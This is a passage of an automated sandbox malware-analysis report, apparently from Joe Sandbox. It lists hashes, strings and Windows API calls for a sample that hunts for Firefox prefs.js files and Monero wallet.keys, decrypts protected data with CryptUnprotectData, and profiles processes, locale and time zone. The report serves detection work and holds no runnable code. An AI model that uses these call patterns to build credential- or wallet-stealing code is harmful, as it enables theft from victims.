                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: prefs.js
                    • API String ID: 3334442632-3783873740
                    • Opcode ID: f43c6643f9a686d5f0df614a04037eaaa1875e4fa6bf79f8f532805cc8b9649f
                    • Instruction ID: b9e227305d7ec12db72660e25e8e78cce7e808b5da569ef58bdf94472b2d9d7f
                    • Opcode Fuzzy Hash: f43c6643f9a686d5f0df614a04037eaaa1875e4fa6bf79f8f532805cc8b9649f
                    • Instruction Fuzzy Hash: E9B184719001049BDB24FF61DC91BEE7379AF54304F0089AFE40A96151EF7CAB59CBAA
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0049510C,?,?,?,004951B4,?,?,00000000,?,00000000), ref: 00471923
                    • StrCmpCA.SHLWAPI(?,0049525C), ref: 00471973
                    • StrCmpCA.SHLWAPI(?,00495304), ref: 00471989
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00471D40
                    • DeleteFileA.KERNEL32(00000000), ref: 00471DCA
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00471E20
                    • FindClose.KERNEL32(000000FF), ref: 00471E32
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 1415058207-1173974218
                    • Opcode ID: 24187e5926842584da826835f2236e4cdf51291138d0710d9cabac1e73374b40
                    • Instruction ID: 26ff79fcc37143082bf6cf4daa54e6abd2ef1a29614fbbc36f3004fc117305b4
                    • Opcode Fuzzy Hash: 24187e5926842584da826835f2236e4cdf51291138d0710d9cabac1e73374b40
                    • Instruction Fuzzy Hash: DC1232719101189AEB15FB61CC96AEE7378AF14304F4049DFB10A62091EF7C6F99CFA5
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00490C2E), ref: 0047DE5E
                    • StrCmpCA.SHLWAPI(?,004914C8), ref: 0047DEAE
                    • StrCmpCA.SHLWAPI(?,004914CC), ref: 0047DEC4
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0047E3E0
                    • FindClose.KERNEL32(000000FF), ref: 0047E3F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                    • String ID: \*.*
                    • API String ID: 2325840235-1173974218
                    • Opcode ID: e93dd20e70d6e7c1caff1953c040fe7dc766d5185f2a3e776c6c75ef50aad7fc
                    • Instruction ID: 7d9eba2c5624eb80f3a891cefba344bfbb66d497da41f071a47a7dae5029bdd3
                    • Opcode Fuzzy Hash: e93dd20e70d6e7c1caff1953c040fe7dc766d5185f2a3e776c6c75ef50aad7fc
                    • Instruction Fuzzy Hash: A7F1B0718141189AEB15FB61CC95EEE7338AF14304F5049EFA40A62051EF7C6B9ACF7A
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004914B0,00490C2A), ref: 0047DAEB
                    • StrCmpCA.SHLWAPI(?,004914B4), ref: 0047DB33
                    • StrCmpCA.SHLWAPI(?,004914B8), ref: 0047DB49
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0047DDCC
                    • FindClose.KERNEL32(000000FF), ref: 0047DDDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID:
                    • API String ID: 3334442632-0
                    • Opcode ID: 934ab1a227b88e9f8b1a1bc4bf7a4c5bd7370530aaedf2860f1c4338f8769abd
                    • Instruction ID: 5e2304b5bc2c92ff68ec59bc82474d467e8624b4345790d16c4f6722ce7bc2e8
                    • Opcode Fuzzy Hash: 934ab1a227b88e9f8b1a1bc4bf7a4c5bd7370530aaedf2860f1c4338f8769abd
                    • Instruction Fuzzy Hash: 029177729101049BDB14FBB1DC569ED737DAF84304F008A6FF80A96141EE7CAB59CBA6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: r}}$"r5$*G>~$1&?>$[9Ss$hg'$ig'$l>S_$v_S
                    • API String ID: 0-1819126714
                    • Opcode ID: 3297d4f9e53efa9b72719e3b2bdc64bc9b1eb75392b2249e68bdde02c1dcc8a5
                    • Instruction ID: 0b98295f8a1d1a48463764b790017cc5183e6dedd1c54c8edc5d458bb3d1741d
                    • Opcode Fuzzy Hash: 3297d4f9e53efa9b72719e3b2bdc64bc9b1eb75392b2249e68bdde02c1dcc8a5
                    • Instruction Fuzzy Hash: 65B225F360C6049FE3046E2DEC8567ABBE5EF84320F16893DEAC5C7744EA3598418697
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • GetKeyboardLayoutList.USER32(00000000,00000000,004905AF), ref: 00487BE1
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00487BF9
                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00487C0D
                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00487C62
                    • LocalFree.KERNEL32(00000000), ref: 00487D22
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                    • String ID: /
                    • API String ID: 3090951853-4001269591
                    • Opcode ID: b443847c6f64ad037cfc24f6a5968467a3fdc156fd0151f39d102eb4382ebc08
                    • Instruction ID: 90eb398c0de0dc9a64c2feb4b37dce4eb933fa3f34ffc50af2ed5d1adba31179
                    • Opcode Fuzzy Hash: b443847c6f64ad037cfc24f6a5968467a3fdc156fd0151f39d102eb4382ebc08
                    • Instruction Fuzzy Hash: D9417271900118ABDB24EF94DC99BEEB374FF44704F2045DAE00962180DB786F85CFA5
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00490D73), ref: 0047E4A2
                    • StrCmpCA.SHLWAPI(?,004914F8), ref: 0047E4F2
                    • StrCmpCA.SHLWAPI(?,004914FC), ref: 0047E508
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0047EBDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 433455689-1173974218
                    • Opcode ID: 16f2f1ec1e466b6f2f14e8cafef8873ff524f7dbf39a155ce1a56aae2b58604a
                    • Instruction ID: e152044c96f9c27055d3efb76722edf6ffdbaccc2db2207c56d7c8e9ad6cc483
                    • Opcode Fuzzy Hash: 16f2f1ec1e466b6f2f14e8cafef8873ff524f7dbf39a155ce1a56aae2b58604a
                    • Instruction Fuzzy Hash: 2E1274719001189AEB14FB61DC96EED7338AF54304F4049AFB50A62091EF7C6F59CFAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: Pg~$/jgo$1u/$3T}$5P^~$K0o
                    • API String ID: 0-49670031
                    • Opcode ID: 255c91b3c45fc85ad9912353b137cad5d200a4c18ae6276bd11e5b9d4fcd035f
                    • Instruction ID: d82538009dd95d882e8e222ba276ea41b4be6f6e2d4750e8709586dc9d2649b4
                    • Opcode Fuzzy Hash: 255c91b3c45fc85ad9912353b137cad5d200a4c18ae6276bd11e5b9d4fcd035f
                    • Instruction Fuzzy Hash: 34B206F360C2049FE304BE29EC8577ABBE9EF94720F16893DE6C5C7744EA3558018696
                    APIs
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479AEF
                    • LocalAlloc.KERNEL32(00000040,?,?,?,00474EEE,00000000,?), ref: 00479B01
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479B2A
                    • LocalFree.KERNEL32(?,?,?,?,00474EEE,00000000,?), ref: 00479B3F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptLocalString$AllocFree
                    • String ID: NG
                    • API String ID: 4291131564-1651712548
                    • Opcode ID: 76f8ebf436b228a16595d696de2467162ac68d1a1212a1c20533ab858e029016
                    • Instruction ID: 4926eff5244f52d61585f180d721c3ba143e8e50fe3a641a7a5e34c8d0794340
                    • Opcode Fuzzy Hash: 76f8ebf436b228a16595d696de2467162ac68d1a1212a1c20533ab858e029016
                    • Instruction Fuzzy Hash: 4B11A4B4240308AFEB10CFA4DC95FAA77B5FB89700F208159FA199B390C775A941CB94
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: AMz7$E}{$[>FR$_Fsw$~*&
                    • API String ID: 0-950904821
                    • Opcode ID: 051e973b3d7aca4181425186249e9a32f6d9f836d04c14f5cf37406ab6cefd8f
                    • Instruction ID: 25e0746759313f86c7d2f5b3ed7b6a33a87638242c428fb3787c19451d89b932
                    • Opcode Fuzzy Hash: 051e973b3d7aca4181425186249e9a32f6d9f836d04c14f5cf37406ab6cefd8f
                    • Instruction Fuzzy Hash: 7DB2F9F36082049FE304AE2DEC8567AB7E9EFD4720F1A493DEAC4C3744E63599058697
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: A?$Q<[$Zw$^*_$ox~G
                    • API String ID: 0-1371497916
                    • Opcode ID: 45f7c82e0fece7b283e7a2ac59a91ecf315e16a8a1a1a37cb502dfa33b6c42f6
                    • Instruction ID: b8a79fba08bd617a0f79415426ac6dda59abed1a0c1579d7c701f1560f8730fa
                    • Opcode Fuzzy Hash: 45f7c82e0fece7b283e7a2ac59a91ecf315e16a8a1a1a37cb502dfa33b6c42f6
                    • Instruction Fuzzy Hash: 59A227F36082009FE304AE2DDC8567ABBE9EFD4720F16493DEAC4C7744E63598158697
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .Yw*$an}$zvu$}|8o$9o>
                    • API String ID: 0-3365920127
                    • Opcode ID: bfe184f37079de0c13e7d02b052e7dc81664364815015e75d6da8ee1911b4338
                    • Instruction ID: 6ad5ab40fc248e5db47375db69199737336e3cbc6e9cbf8c67767dd4d057db96
                    • Opcode Fuzzy Hash: bfe184f37079de0c13e7d02b052e7dc81664364815015e75d6da8ee1911b4338
                    • Instruction Fuzzy Hash: C7B208F3A082049FD304AE2DEC8567ABBE5EF94720F1A453DEAC4C7744EA3598048797
                    APIs
                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0047C871
                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0047C87C
                    • lstrcat.KERNEL32(?,00490B46), ref: 0047C943
                    • lstrcat.KERNEL32(?,00490B47), ref: 0047C957
                    • lstrcat.KERNEL32(?,00490B4E), ref: 0047C978
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: lstrcat$BinaryCryptStringlstrlen
                    • String ID:
                    • API String ID: 189259977-0
                    • Opcode ID: 562dbca1de5f906c4eefa7daf0b4e5457259797662369a8e655da11ea07cbc42
                    • Instruction ID: 4406d16ce6d013763b2dcb84bd2484df948d9bb13c8a25418a1df76e85ca596f
                    • Opcode Fuzzy Hash: 562dbca1de5f906c4eefa7daf0b4e5457259797662369a8e655da11ea07cbc42
                    • Instruction Fuzzy Hash: 2C4171F5D04219DFDB10DFE4CD89BEEB7B9BB48304F1042A9E609A6280D7745A84CF96
                    APIs
                    • GetSystemTime.KERNEL32(?), ref: 0048696C
                    • sscanf.NTDLL ref: 00486999
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004869B2
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004869C0
                    • ExitProcess.KERNEL32 ref: 004869DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Time$System$File$ExitProcesssscanf
                    • String ID:
                    • API String ID: 2533653975-0
                    • Opcode ID: d0acc49ea327c8f3bb93e8f1d72d7c8e07bae1b65edddd9322fba2035d2c5f8a
                    • Instruction ID: eddc1433ef7a3f56e174c34823eb496ab8357cb2a9f1a000371ea277f7076795
                    • Opcode Fuzzy Hash: d0acc49ea327c8f3bb93e8f1d72d7c8e07bae1b65edddd9322fba2035d2c5f8a
                    • Instruction Fuzzy Hash: 7A21EEB5D14208ABCF44EFE4D9459EEB7B6FF48300F04856EE406E3250EB745645CB69
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0047724D
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00477254
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00477281
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004772A4
                    • LocalFree.KERNEL32(?), ref: 004772AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                    • String ID:
                    • API String ID: 2609814428-0
                    • Opcode ID: 244b02b720ca9f54d762347ea7d0817bc4501b35f77656e5083415348f325326
                    • Instruction ID: 125770a6a37d659a905d2a8a248da9bf32e15df793873a50f489baa627936847
                    • Opcode Fuzzy Hash: 244b02b720ca9f54d762347ea7d0817bc4501b35f77656e5083415348f325326
                    • Instruction Fuzzy Hash: 6C0112B5A40208BBEB10DFD4CD45F9E7779EB44700F108155FB09AB2C0D674AA418B69
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0048961E
                    • Process32First.KERNEL32(00490ACA,00000128), ref: 00489632
                    • Process32Next.KERNEL32(00490ACA,00000128), ref: 00489647
                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0048965C
                    • CloseHandle.KERNEL32(00490ACA), ref: 0048967A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: d59316a50639213f8f546f4f3ff45a608908a1b7470f9bdffc9c2f3ec8db4ab0
                    • Instruction ID: b5645760c68264e1900152c61d95bbdd51f3d2b660eaccbc5566d5dd205ba0bf
                    • Opcode Fuzzy Hash: d59316a50639213f8f546f4f3ff45a608908a1b7470f9bdffc9c2f3ec8db4ab0
                    • Instruction Fuzzy Hash: F2010CB5A00208ABCB14DFA5DD58BEEB7F9EB48300F144699A905A6240EB349F81DF51
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: \>$8@;a$qs$-cV
                    • API String ID: 0-2433157952
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: '\y$A/wM$W"[_$\ ]S
                    • API String ID: 0-1311202765
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ^V>+$~qV$j=$w7?
                    • API String ID: 0-3978660184
                    APIs
                    • CryptBinaryToStringA.CRYPT32(00000000,00475184,40000001,00000000,00000000,?,00475184), ref: 00488EC0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptString
                    • String ID:
                    • API String ID: 80407269-0
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0123E028,00000000,?,00490E10,00000000,?,00000000,00000000), ref: 00487A63
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00487A6A
                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0123E028,00000000,?,00490E10,00000000,?,00000000,00000000,?), ref: 00487A7D
                    • wsprintfA.USER32 ref: 00487AB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                    • String ID:
                    • API String ID: 3317088062-0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: #Q}3$.8?$5|
                    • API String ID: 0-3686594883
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 3_w$'lt$n+7{
                    • API String ID: 0-1479877609
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .Mn?$@p_o$X](w
                    • API String ID: 0-2197809461
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: IWw$_b~x$E-b
                    • API String ID: 0-3288455321
                    APIs
                    • CoCreateInstance.COMBASE(0048E118,00000000,00000001,0048E108,00000000), ref: 00483758
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004837B0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID:
                    • API String ID: 123533781-0
                    APIs
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00479B84
                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00479BA3
                    • LocalFree.KERNEL32(?), ref: 00479BD3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$AllocCryptDataFreeUnprotect
                    • String ID:
                    • API String ID: 2068576380-0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: @w/
                    • API String ID: 0-1462114854
                    • Opcode ID: 850ed8d1cf0e611b3ae9911c0184da492441227e10c2ae52d3156e020b2fd115
                    • Instruction ID: 2f1089c656e12c0ed688180c671ddae1862dcd6b7b7055ff34b692ebc5feef50
                    • Opcode Fuzzy Hash: 850ed8d1cf0e611b3ae9911c0184da492441227e10c2ae52d3156e020b2fd115
                    • Instruction Fuzzy Hash: 7C515EF361C3049FE7086E7DEC9873A77D5EB54320F2A463DEAC597384E97518058286
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d7c5cd7d5efe8fec6fc98bf58db4b5817cb7bc1993ade98db71cf61c09c68722
                    • Instruction ID: d108404e64fe00beee418bd34e1c50278f859d6845e5ddbc06f3f6f606fed7b8
                    • Opcode Fuzzy Hash: d7c5cd7d5efe8fec6fc98bf58db4b5817cb7bc1993ade98db71cf61c09c68722
                    • Instruction Fuzzy Hash: E27106B3E182109FE3086E38DC1537AB7E9EF94320F1B453DDAC697784DA7558408782
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
